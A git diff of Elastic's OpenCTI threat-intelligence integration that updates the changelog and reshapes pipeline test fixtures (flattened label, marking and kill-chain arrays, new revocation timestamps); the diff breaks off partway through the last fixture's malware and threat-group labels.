@@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "2.0.0" + changes: + - description: Update for OpenCTI v5.12.24 GraphQL schema change + type: bugfix + link: https://github.com/elastic/integrations/pull/9088 +- version: "1.1.0" + changes: + - description: Add support for IOC expiration + type: enhancement + link: https://github.com/elastic/integrations/pull/8920 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json index 58eb7d8adeb..88985662926 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json 
@@ -23,68 +23,42 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "rat" - } - }, - { - "node": { - "value": "stealer" - } - }, - { - "node": { - "value": "themida" - } - }, - { - "node": { - "value": "cryptocurrencies" - } - }, - { - "node": { - "value": "ekipa" - } - }, - { - "node": { - "value": "aurora" - } - }, - { - "node": { - "value": "aurora stealer" - } - }, - { - "node": { - "value": "ekipa rat" - } - }, - { - "node": { - "value": "rilide" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "rat" + }, + { + "value": "stealer" + }, + { + "value": "themida" + }, + { + "value": "cryptocurrencies" + }, + { + "value": "ekipa" + }, + { + "value": "aurora" + }, + { + "value": "aurora stealer" + }, + { + "value": "ekipa rat" + }, + { + "value": "rilide" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -106,4 +80,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json index bd6b7f11b25..1538d0f44e3 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2024-04-04T07:45:52.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, 
diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json index 71bccb30875..24b1678a9ff 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json @@ -29,24 +29,16 @@ }, "id": "fcfa872e-a8b6-4525-847e-f3c756b70035", "is_inferred": false, - "killChainPhases": { - "edges": null - }, + "killChainPhases": [], "lang": "en", "modified": "2023-11-09T23:22:20.586Z", "name": "freelifetimexxxdates.com", - "objectLabel": { - "edges": [ - { - "node": { - "value": "spam" - } - } - ] - }, - "objectMarking": { - "edges": null - }, + "objectLabel": [ + { + "value": "spam" + } + ], + "objectMarking": [], "observables": { "edges": [ { diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json index 95f07ae5f30..838194a19ab 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json @@ -30,6 +30,7 @@ "https://example.com/CVE-0079-1234" ] }, + "invalid_or_revoked_from": "2024-11-08T23:22:19.426Z", "is_inferred": false, "lang": "en", "observables_count": 1, @@ -85,4 +86,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json index 3e48401c253..65b1459cd3f 100644 
--- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json @@ -23,33 +23,21 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "iran" - } - }, - { - "node": { - "value": "oilrig" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "iran" + }, + { + "value": "oilrig" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -71,4 +59,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json index e80c0441574..d937c16d518 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-03-31T10:42:38.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json index b886af3ab07..d3a252ab6d9 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json 
@@ -23,33 +23,21 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "ransomware" - } - }, - { - "node": { - "value": "gryphon" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "ransomware" + }, + { + "value": "gryphon" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -72,4 +60,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json index 47c0779d0d9..bad46735a22 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-04T09:57:02.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json index 87a0f4e0403..995b623fc82 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json 
@@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -72,4 +62,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json index 6cfc3d40d90..9cbab5d81c1 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-08-16T14:29:16.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json index 6f2c1dd1974..92daf819608 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json 
@@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -78,4 +68,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json index 55da1bc4d48..a1555ce4a52 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-06-19T22:22:09.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json index 31e7f85616e..709dd8c9c92 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json 
@@ -23,53 +23,33 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - }, - { - "node": { - "value": "unit42" - } - }, - { - "node": { - "value": "steganography" - } - }, - { - "node": { - "value": "stegbaus" - } - }, - { - "node": { - "value": "runpe" - } - }, - { - "node": { - "value": "loader" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "malware" + }, + { + "value": "unit42" + }, + { + "value": "steganography" + }, + { + "value": "stegbaus" + }, + { + "value": "runpe" + }, + { + "value": "loader" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -106,4 +86,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json index 5377201b26c..9e3a9f888ec 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-02-10T21:37:17.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json index 685938bd19c..c8f0280c075 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json 
+++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json 
@@ -23,128 +23,78 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "android" - } - }, - { - "node": { - "value": "macosx" - } - }, - { - "node": { - "value": "watering hole" - } - }, - { - "node": { - "value": "tran duy linh" - } - }, - { - "node": { - "value": "spearphishing" - } - }, - { - "node": { - "value": "scarlet mimic" - } - }, - { - "node": { - "value": "fakem" - } - }, - { - "node": { - "value": "mnkit" - } - }, - { - "node": { - "value": "crypticconvo" - } - }, - { - "node": { - "value": "mobileorder" - } - }, - { - "node": { - "value": "raidbase" - } - }, - { - "node": { - "value": "skiboot" - } - }, - { - "node": { - "value": "psylo" - } - }, - { - "node": { - "value": "uyghurs" - } - }, - { - "node": { - "value": "wingd" - } - }, - { - "node": { - "value": "fakehighfive" - } - }, - { - "node": { - "value": "brutishcommand" - } - }, - { - "node": { - "value": "subtractthis" - } - }, - { - "node": { - "value": "fullthrottle" - } - }, - { - "node": { - "value": "piggyback" - } - }, - { - "node": { - "value": "fakefish" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "android" + }, + { + "value": "macosx" + }, + { + "value": "watering hole" + }, + { + "value": "tran duy linh" + }, + { + "value": "spearphishing" + }, + { + "value": "scarlet mimic" + }, + { + "value": "fakem" + }, + { + "value": "mnkit" + }, + { + "value": "crypticconvo" + }, + { + "value": "mobileorder" + }, + { + "value": "raidbase" + }, + { + "value": "skiboot" + }, + { + "value": "psylo" + }, + { + "value": "uyghurs" + }, + { + "value": "wingd" + }, + { + "value": "fakehighfive" + }, + { + "value": "brutishcommand" + }, + { + "value": "subtractthis" + }, + { + 
"value": "fullthrottle" + }, + { + "value": "piggyback" + }, + { + "value": "fakefish" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -166,4 +116,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json index ba8efe8c500..1451cbb7502 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-hostname.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-23T14:00:35.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json index 9e3fcc26634..803dfc6d1c1 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json 
@@ -23,53 +23,33 @@ "identity_class": "organization", "name": "MalwareMustDie" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - }, - { - "node": { - "value": "linux" - } - }, - { - "node": { - "value": "botnet" - } - }, - { - "node": { - "value": "password brute forcing" - } - }, - { - "node": { - "value": "machine-access-control" - } - }, - { - "node": { - "value": "ongoing" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + }, + { + "value": "linux" + }, + { + "value": "botnet" + }, + { + "value": "password brute forcing" + }, + { + "value": "machine-access-control" + }, + { + "value": "ongoing" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -91,4 +71,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json index 489d91f2e00..adb5b2e3607 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv4-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2020-04-08T11:00:32.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json index d0170d9fe87..74455768c5e 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json 
+++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json @@ -23,38 +23,24 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "osint" - } - }, - { - "node": { - "value": "blog-post" - } - }, - { - "node": { - "value": "testing" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "osint" + }, + { + "value": "blog-post" + }, + { + "value": "testing" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -76,4 +62,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json index fd71a0ba00d..2675c92262e 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-ipv6-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-12-07T09:45:15.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json index e8024e2d82f..f479a35d94d 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json 
@@ -23,63 +23,39 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "office" - } - }, - { - "node": { - "value": "turla" - } - }, - { - "node": { - "value": "sofacy" - } - }, - { - "node": { - "value": "apt28" - } - }, - { - "node": { - "value": "0day" - } - }, - { - "node": { - "value": "fireeye" - } - }, - { - "node": { - "value": "netwire" - } - }, - { - "node": { - "value": "gamefish" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "office" + }, + { + "value": "turla" + }, + { + "value": "sofacy" + }, + { + "value": "apt28" + }, + { + "value": "0day" + }, + { + "value": "fireeye" + }, + { + "value": "netwire" + }, + { + "value": "gamefish" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -101,4 +77,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json index 12c27e74e9d..5652a1159bd 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-mutex.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-05-09T18:56:06.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json index 98fc3e294d0..11d90ed7a75 100644 
--- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "scam" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "scam" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -56,4 +46,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json index 91a14866b7d..0635b7e69bd 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-phone-number.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-10-31T15:00:07.000Z", "is_inferred": false, "lang": "en", "observables_count": 0, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json index 330493abd92..f54a2249cef 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json 
@@ -23,15 +23,9 @@ "identity_class": "tester", "name": "Manual" }, - "objectMarking": { - "edges": [] - }, - "objectLabel": { - "edges": [] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [], + "objectLabel": [], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -64,4 +58,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json index 53bd5105eb0..132bab30a4a 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-process.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "tester", "detection": false, + "invalid_or_revoked_from": "2017-10-22T14:00:51.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json index a678b3d2818..2bcc2db06d2 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json 
@@ -23,96 +23,60 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "rat" - } - }, - { - "node": { - "value": "kaspersky" - } - }, - { - "node": { - "value": "windows" - } - }, - { - "node": { - "value": "israel" - } - }, - { - "node": { - "value": "india" - } - }, - { - "node": { - "value": "keylogger" - } - }, - { - "node": { - "value": "hawkeye" - } - }, - { - "node": { - "value": "cybergate" - } - }, - { - "node": { - "value": "nanocore" - } - }, - { - "node": { - "value": "darkcomet" - } - }, - { - "node": { - "value": "grabit" - } - }, - { - "node": { - "value": "cyborg" - } - } - ] - }, - "killChainPhases": { - "edges": [ - { - "node": { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - }, - { - "node": { - "kill_chain_name": "mitre-attack", - "phase_name": "collection" - } - } - ] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "rat" + }, + { + "value": "kaspersky" + }, + { + "value": "windows" + }, + { + "value": "israel" + }, + { + "value": "india" + }, + { + "value": "keylogger" + }, + { + "value": "hawkeye" + }, + { + "value": "cybergate" + }, + { + "value": "nanocore" + }, + { + "value": "darkcomet" + }, + { + "value": "grabit" + }, + { + "value": "cyborg" + } + ], + "killChainPhases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], "externalReferences": { "edges": [] }, @@ -124,4 +88,4 @@ } } ] -} \ No newline at end of file +} 
diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json index 54eff73480b..0a06741bbc3 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-unknown.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-23T14:00:11.000Z", "is_inferred": false, "kill_chain_phase": [ "[mitre-attack] defense-evasion", diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json index 2352958ec26..a49eac6c841 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-url.json 
@@ -23,153 +23,93 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "isspace" - } - }, - { - "node": { - "value": "flash" - } - }, - { - "node": { - "value": "menupass" - } - }, - { - "node": { - "value": "sofacy" - } - }, - { - "node": { - "value": "hacking team" - } - }, - { - "node": { - "value": "sednit" - } - }, - { - "node": { - "value": "apt12" - } - }, - { - "node": { - "value": "apt3" - } - }, - { - "node": { - "value": "ups" - } - }, - { - "node": { - "value": "wekby" - } - }, - { - "node": { - "value": "httpbrowser" - } - }, - { - "node": { - "value": "apt18" - } - }, - { - "node": { - "value": "evilgrab" - } - }, - { - "node": { - "value": "plugx" - } - }, - { - "node": { - "value": "apt10" - } - }, - { - "node": { - "value": "gh0st" - } - }, - { - "node": { - "value": "t5000" - } - }, - { - "node": { - "value": "dnscalc" - } - }, - { - "node": { - "value": "conimes" - } - }, - { - "node": { - "value": "apt20" - } - }, - { - "node": { - "value": "california roll" - } - }, - { - "node": { - "value": "shadowserver" - } - }, - { - "node": { - "value": "terminator" - } - }, - { - "node": { - "value": "emdivi" - } - }, - { - "node": { - "value": "linopid" - } - }, - { - "node": { - "value": "hothot" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "isspace" + }, + { + "value": "flash" + }, + { + "value": "menupass" + }, + { + "value": "sofacy" + }, + { + "value": "hacking team" + }, + { + "value": "sednit" + }, + { + "value": "apt12" + }, + { + "value": "apt3" + }, + { + "value": "ups" + }, + { + "value": "wekby" + }, + { + "value": "httpbrowser" + }, + { + "value": "apt18" + }, + { + "value": "evilgrab" + }, + { + "value": "plugx" + }, 
